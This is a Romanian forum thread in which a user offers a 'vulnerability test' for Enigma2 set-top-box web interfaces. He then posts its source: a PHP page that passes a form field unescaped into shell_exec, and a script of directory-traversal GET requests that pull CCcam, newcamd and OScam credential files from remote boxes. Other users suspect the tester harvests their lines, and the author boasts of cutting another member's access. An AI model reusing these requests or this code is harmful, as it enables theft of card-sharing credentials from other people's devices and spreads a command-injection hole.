Enigma1/2 WEBIF VULN TEST

[puidezmeu]

Daca iti apare config-ul de la cccam sau oscam dupa ce apesi pe Submit Query! Blocheaza-ti portul 80 sau schimba-ti imaginea cu una mai noua.
Merge testat doar daca cutia e pe acelasi ip(extern) cu PC ex: pc si dm ies pe net printr-un router si portul 80 are forward catre dm!
TEST AICI!!

[zildan]

Adica le iei deja configurile cand fac testul?

[konstantine]

Dar daca folosesc un firewall standalone (hardware ,in care by rulles blochez porturile vulnerabile) mai poate exista vreo problema?

[puidezmeu]

Daca folosesti fw sau ai porturile blocate din router nu merge..dar multi au cutia pusa in dmz(probabil de lene sa faca un forward la un port)
Scriptul nu salveaza configurile le face print pe ecran si atat...il foloseste cine vrea....

[konstantine]

Preventiv am firewall hardware,localu' il am indoor asa ca "e grele" Si la net,ies prin 3 routere...Cica prevederea e mama intelepciunii...

http://www.canyouseeme.org/

[bennykoo]

deci daca testu-i negativ,e de bine?

[puidezmeu]

daca nu apare cfg da e de bine...inseamna ca nu te pot arde pe webif..decat pe ssh,telnet,stream daca sunt deschise

[djczefre]

E buna dresa asta (lynk) ? Mie i-mi da eroare!

[zildan]

Am operat-o eu.

[djczefre]

Pana la urma nu inteleg nimica. Deci mai pot face test undeva s-au nu are rost! La mine apare pagine inexistenta! Sunt dupa router .Ro.

S-au @puidezmeu face figuri si cu aceasta metoda de test face prostii adica fura liniile direkt pt. el ? Sincer eu m-am pierdut!

[zildan]

Daca pune sursa aici in clar ii dam drumu.
Ti-ai raspuns singur la intrebari.

[puidezmeu]

ce crezi ca se vede in sursa?
are un shell_exec..la un script..

Code:

<?php
echo '
<html>
<body>
<br>BEBELUSUL webif tester beta1 using 5 public webif e x p l o i t s!!!.
<form action="'.htmlentities($_SERVER['PHP_SELF']).'" method="post">
Test your STB: <input type="hidden" name="aaa" value='.$_SERVER['REMOTE_ADDR'].' readonly>
<input type="submit">
</form>
</body>';
if (isset($_POST["aaa"]) && !empty($_POST["aaa"])) {
$host = $_POST['aaa'];
$cmd= "/x/mar/UTILS/webz $host";
$output = shell_exec($cmd);
echo "<pre>$output</pre>";


}
?>

Code:

echo "######################    $1       #####################"
 /x/mar/UTILS/web1 $1 /var/etc/CCcam.cfg
 /x/mar/UTILS/web1 $1 /var/keys/newcamd.list
 /x/mar/UTILS/web1 $1 /var/tuxbox/config/oscam.server
 /x/mar/UTILS/web1 $1 /var/tuxbox/config/oscam.conf
 /x/mar/UTILS/web1 $1 /var/tuxbox/config/newcamd.conf
 /x/mar/UTILS/web2 $1 /var/etc/CCcam.cfg
 /x/mar/UTILS/web2 $1 /var/keys/newcamd.list
 /x/mar/UTILS/web2 $1 /var/tuxbox/config/oscam.server
 /x/mar/UTILS/web2 $1 /var/tuxbox/config/oscam.conf
 /x/mar/UTILS/web2 $1 /var/tuxbox/config/newcamd.conf
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fetc%2FCCcam.cfg
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys%2Fnewcamd.list
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxbox%2Fconfig%2Foscam.server
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxbox%2Fconfig%2Foscam.conf
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys%2Fnewcamd.conf
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxbox%2Fconfig%2Foscam.server
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxbox%2Fconfig%2Foscam.conf


/x/mar/UTILS/web3 $1

web1 web2 web3 sunt exploituri pt webif(le gasiti pe google)
DJ-HU stiu ca crapa pipota in tine de cand ti-am taiat liniile ...dar asta e..testeaza-ti tu cutia la calorifer sau cu un ciocan!
Se poate sterge thread-ul!

[zildan]

Am refacut lynk-ul.